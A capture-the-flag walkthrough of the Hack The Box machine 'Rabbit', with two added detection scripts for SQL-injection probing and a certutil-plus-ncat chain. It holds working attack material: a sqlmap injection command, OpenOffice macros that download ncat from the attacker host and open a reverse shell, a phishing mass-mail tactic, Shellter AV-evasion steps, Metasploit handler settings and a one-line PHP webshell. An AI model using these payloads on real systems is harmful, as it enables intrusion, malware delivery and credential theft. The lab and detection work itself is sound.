25/tcp    open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m01s from scanner time.
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp    open  http          Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2018-06-27 18:44:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after:  2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:57+00:00; +5h00m00s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
587/tcp   open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
| Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local
| Not valid before: 2017-10-24T17:56:42
|_Not valid after:  2022-10-24T17:56:42
|_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m00s from scanner time.
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
808/tcp   open  ccproxy-http?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3306/tcp  open  mysql         MySQL 5.7.19
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5722/tcp  open  msrpc         Microsoft Windows RPC
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6002/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6003/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6004/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6005/tcp  open  msrpc         Microsoft Windows RPC
6006/tcp  open  msrpc         Microsoft Windows RPC
6007/tcp  open  msrpc         Microsoft Windows RPC
6008/tcp  open  msrpc         Microsoft Windows RPC
6010/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6011/tcp  open  msrpc         Microsoft Windows RPC
6017/tcp  open  msrpc         Microsoft Windows RPC
6142/tcp  open  msrpc         Microsoft Windows RPC
8080/tcp  open  http          Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
9389/tcp  open  mc-nmf        .NET Message Framing
44668/tcp open  msrpc         Microsoft Windows RPC
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50242/tcp open  msrpc         Microsoft Windows RPC
50246/tcp open  msrpc         Microsoft Windows RPC
50292/tcp open  msrpc         Microsoft Windows RPC
50299/tcp open  msrpc         Microsoft Windows RPC
50327/tcp open  msrpc         Microsoft Windows RPC
50343/tcp open  msrpc         Microsoft Windows RPC
50354/tcp open  msrpc         Microsoft Windows RPC
50363/tcp open  msrpc         Microsoft Windows RPC
50365/tcp open  msrpc         Microsoft Windows RPC
50374/tcp open  msrpc         Microsoft Windows RPC
50387/tcp open  msrpc         Microsoft Windows RPC
50395/tcp open  msrpc         Microsoft Windows RPC
50410/tcp open  msrpc         Microsoft Windows RPC
50422/tcp open  msrpc         Microsoft Windows RPC
64337/tcp open  mc-nmf        .NET Message Framing
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1
On the main page of the complaint application at 10.10.10.71:8080/complain/:
Online Complaint Monitoring System (OCMS) is a system operated by the city of Pune, India. A Complaint Management System is one of the latest productivity enhancement tools used widely by all organisations wherever there is a need for booking complaints via operators and analysing complaints which are made or are pending.
Searching online for an exploit for this framework, we found a blind SQL injection that is abused through a hardcoded admin login (admin:admin123); that default login does not work on this installation, so we need to register as a Customer to get a valid session before performing the attack.
sqlmap -u "http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans" --cookie "PHPSESSID=shuv7rnuvj10rds4leqq4of5f6" --dbms mysql --random-agent -p id
We can reach mod=admin even though we registered as a Customer.
Now we can dump all the data from the complain, joomla and secret databases.
From the secret database we got a bunch of credentials:
Unfortunately those credentials do not work on the Joomla installation, so we tried to log in to Outlook Web App (OWA):
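An added detection example, not part of the original writeup: the sqlmap run above used --random-agent, so a User-Agent check alone would miss it. This script instead flags a client that sends several distinct SQL-looking values for the parameters of one endpoint, here the id parameter of /complain/view.php; the access-log lines, the rule threshold and the keyword list are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Combined-format Apache access log: we only need client, method, URL and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Fragments typical of boolean- and time-based blind payloads against MySQL.
# The bare quote is noisy on real traffic (names like O'Brien); tune per application.
SQL_HINT = re.compile(r"(\bAND\b|\bOR\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bSELECT\b|\bUNION\b|'|--)", re.I)

# Constructed log lines: the first client probes the "id" parameter of
# /complain/view.php with three different payloads; the second is a normal user.
SAMPLE_LOG = [
    '10.10.14.129 - - [27/Jun/2018:19:02:10 +0000] "GET /complain/view.php?mod=admin&view=repod&id=plans HTTP/1.1" 200 5123',
    '10.10.14.129 - - [27/Jun/2018:19:02:11 +0000] "GET /complain/view.php?mod=admin&view=repod&id=plans%27%20AND%205489%3D5489--%20ab HTTP/1.1" 200 5123',
    '10.10.14.129 - - [27/Jun/2018:19:02:11 +0000] "GET /complain/view.php?mod=admin&view=repod&id=plans%27%20AND%20SLEEP(5)--%20xy HTTP/1.1" 200 5123',
    '10.10.14.129 - - [27/Jun/2018:19:02:17 +0000] "GET /complain/view.php?mod=admin&view=repod&id=plans%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 7710',
    '10.10.14.50 - - [27/Jun/2018:19:03:00 +0000] "GET /complain/view.php?mod=customer&view=list&id=12 HTTP/1.1" 200 3001',
]

def injected_params(url):
    """Return {param: decoded value} for query parameters whose value looks like SQL."""
    query = parse_qs(urlparse(url).query, keep_blank_values=True)  # percent-decodes the values
    return {k: v[0] for k, v in query.items() if SQL_HINT.search(v[0])}

def scan_log(lines, threshold=3):
    """Count distinct suspicious payloads per (client, path); report those at or above threshold."""
    payloads = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        bad = injected_params(m["url"])
        if bad:
            payloads[(m["ip"], urlparse(m["url"]).path)].update(bad.values())
    return {key: len(vals) for key, vals in payloads.items() if len(vals) >= threshold}
```

On the constructed log, only 10.10.14.129 is reported, with three distinct payloads against /complain/view.php.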
Ariel works on OWA and ECP
Kain works on OWA and ECP
Magnus works on OWA and ECP
Raziel is listed as a user but we cannot log in with those credentials
Dimitri has an email address but cannot receive mail
From Ariel's mailbox we saw that the Administrator changed some software configuration:
Now all computers use OpenOffice by default, but they also deployed Windows Defender and some PowerShell constraints.
In addition, we know that the Administrator is waiting for an email with some TPS reports.
Wrapping it all up: we can generate a malicious OpenOffice document that spawns a reverse shell, but we cannot use PowerShell and we may need some AV evasion for our payload/macro.
We could use the Metasploit module exploit/multi/misc/openoffice_document_macro, but it creates a PowerShell dropper to start a Meterpreter session, so we preferred to build the macro ourselves.
We tried to generate our Meterpreter shell with msfvenom
and created a macro that downloads and executes it over SMB with impacket (smbserver.py DODO .):
Sub OnLoad
    Shell("echo Pwned!")
    Shell("cmd.exe /C net use /D /Y * && cmd.exe /C net use \\10.10.14.38\DODO & call \\10.10.14.38\DODO\dodo.exe")
End Sub
Using the created ELF locally (and then remotely), we failed miserably: Windows detected the malicious PE.
Windows detected our session and deleted the shell. We must focus on getting a simple reverse shell.
After a lot of tries we created a payload that pings our machine and downloads something using certutil instead of PowerShell.
Finally we crafted the ultimate payload:
Sub OnLoad
    Shell("cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f ""http://10.10.15.24/ncat.exe"" C:\Users\Public\ncat.exe & C:\Users\Public\ncat.exe 10.10.15.24 443 -e powershell.exe")
End Sub
1. Spawn a cmd.exe.
2. Download a portable version of netcat using certutil from our machine (python -m http.server 80).
3. Save the file in C:\Users\Public (some other well-known paths did not work).
4. Call ncat.exe to connect to the listening machine, spawning a PowerShell shell.
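An added detection example, not from the original writeup: the chain above leaves a distinctive process-creation trail (an OpenOffice parent spawning cmd.exe, certutil.exe called with -urlcache and -f, and ncat with -e). This script classifies Sysmon-style process events reduced to a constructed parent|image|commandline form; the sample events, rule names and the OFFICE_PARENTS list are assumptions.

```python
import re

# Parent images that should rarely spawn a command interpreter (assumed list).
OFFICE_PARENTS = ("soffice.bin", "soffice.exe", "winword.exe", "excel.exe")

# Constructed sample events, one per entry: "parent_image|image|command_line".
# The first three mirror the chain used in this writeup; the last is benign certutil use.
SAMPLE_EVENTS = [
    r"C:\Program Files\OpenOffice\program\soffice.bin|C:\Windows\System32\cmd.exe|"
    r'cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f '
    r'"http://10.10.15.24/ncat.exe" C:\Users\Public\ncat.exe',
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|"
    r'certutil.exe -urlcache -split -f "http://10.10.15.24/ncat.exe" C:\Users\Public\ncat.exe',
    r"C:\Windows\System32\cmd.exe|C:\Users\Public\ncat.exe|"
    r"C:\Users\Public\ncat.exe 10.10.15.24 443 -e powershell.exe",
    r"C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|"
    r"certutil.exe -verify C:\Users\Public\driver.cer",
]

def parse_event(line):
    """Split an event into lower-cased base names of parent/image plus the raw command line."""
    parent, image, cmd = line.split("|", 2)
    return {"parent": parent.rsplit("\\", 1)[-1].lower(),
            "image": image.rsplit("\\", 1)[-1].lower(),
            "cmd": cmd}

def classify(ev):
    """Return the names of the rules the event triggers (empty list = not flagged)."""
    hits = []
    cmd = ev["cmd"].lower()
    if ev["parent"] in OFFICE_PARENTS and ev["image"] in ("cmd.exe", "powershell.exe"):
        hits.append("office_spawns_shell")
    # certutil used as a downloader: -urlcache together with -f <url>
    if "certutil" in cmd and "-urlcache" in cmd and re.search(r"-f\s+\S*https?://", cmd):
        hits.append("certutil_download")
    # netcat-style "-e cmd.exe" / "-e powershell.exe": a shell attached to a socket
    if re.search(r"\s-e\s+(cmd|powershell)(\.exe)?\b", cmd):
        hits.append("nc_exec_shell")
    # the chain staged its tooling in the world-writable C:\Users\Public
    if hits and "c:\\users\\public\\" in cmd:
        hits.append("public_dir_staging")
    return hits

def scan(lines):
    """Return (image, triggered rules) for every flagged event, in input order."""
    flagged = []
    for ev in map(parse_event, lines):
        hits = classify(ev)
        if hits:
            flagged.append((ev["image"], hits))
    return flagged
```

The benign certutil -verify event is not flagged because the downloader rule requires -urlcache and a URL after -f together.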
Now it's time to send the malicious ODT to someone. When in doubt… ¯\_(ツ)_/¯ …use brute force: send the mail to everyone.
From OWA we kindly sent the file to everyone, suggesting they enable macros.
After a while (5-6 minutes) we saw a download of the netcat file and the shell popped as the Raziel user! Now we also know who the right recipient is!
Finally we were able to read the Rabbit user flag.
Now we need to upgrade our shell to a Meterpreter session and escalate to Administrator, but we can't use PowerShell since the shell is in ConstrainedLanguage mode ($ExecutionContext.SessionState.LanguageMode) and we can't spawn PowerShell version 2 (powershell -version 2) to bypass the jail.
We tried to upload an EXE generated with msfvenom, but its execution is blocked by the AV, so we created a FUD EXE with Shellter:
ncat.exe (an EXE we already had in the folder) as the base; use your own EXE in a real-world scenario
enable Auto mode
enable Stealth mode (when you use the Stealth Mode feature you need to set the payload exit function to Thread)
set the payload to Meterpreter_Reverse_TCP
set LHOST
set LPORT
upload it to the machine: certutil -urlcache -split -f "http://10.10.15.198/dodo.exe" C:\Users\Public\dodo.exe
set up the Metasploit listener: use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 3487; set AutoRunScript post/windows/manage/migrate; run -j;
But after a few seconds the connection is killed on the target side for some reason (maybe the AV detects something in memory). We have to stick with the constrained shell spawned with netcat.
net user Raziel
User name                    Raziel
Full Name                    Raziel
Comment                      User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/29/2017 10:04:44 AM
Password expires             Never
Password changeable          10/30/2017 10:04:44 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   8/11/2018 12:00:39 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Discovery Management  *Mailbox Import-Export
                             *Domain Users          *Organization Manageme
The command completed successfully.
From the Joomla installation we read the user and password of the MySQL service, but we weren't able to find or exploit anything beyond what we already saw with sqlmap.
type C:\wamp64\www\joomla\configuration.php
public $host = 'localhost';
public $user = 'dbuser';
public $password = 'zLlYCLRmqFMaONwY';
public $db = 'joomla';
public $dbprefix = 'llhe4_';
public $live_site = '';
public $secret = 'QJMwxJmeJP18x25X';
We first focused on searching for SYSTEM/NT services to hijack, but from tasklist /V we found that only the Father of All Processes is owned by NT AUTHORITY\SYSTEM.
Since we were interested in the MySQL service we headed to C:\wamp64\www, where all the web-server configurations are stored, and started searching for a configuration containing the root password; there we also found an index.old.php.
From this page we saw that the alias wordpress.htb.local exists, but it is not present in the Apache www directory. From the man page of the tasklist command we learned that system processes return an empty string for the user name, so httpd.exe could be running as the admin user, since we didn't see an associated user for that process.
We created the wordpress folder in C:\wamp64\www and added the domain to our /etc/hosts file.
We created a PHP file from PowerShell (echo "<?\necho 'ciao';\n" > dodo.php), but for some reason it didn't work (PowerShell added some strange characters…).
So we wrote a simple webshell and uploaded it to the Rabbit machine with curl.
<?php system($_GET["cmd"]);
Now we can easily read the root flag with httpie: http http://wordpress.htb.local:8080/index.php\?cmd\="type C:\Users\Administrator\Desktop\root.txt".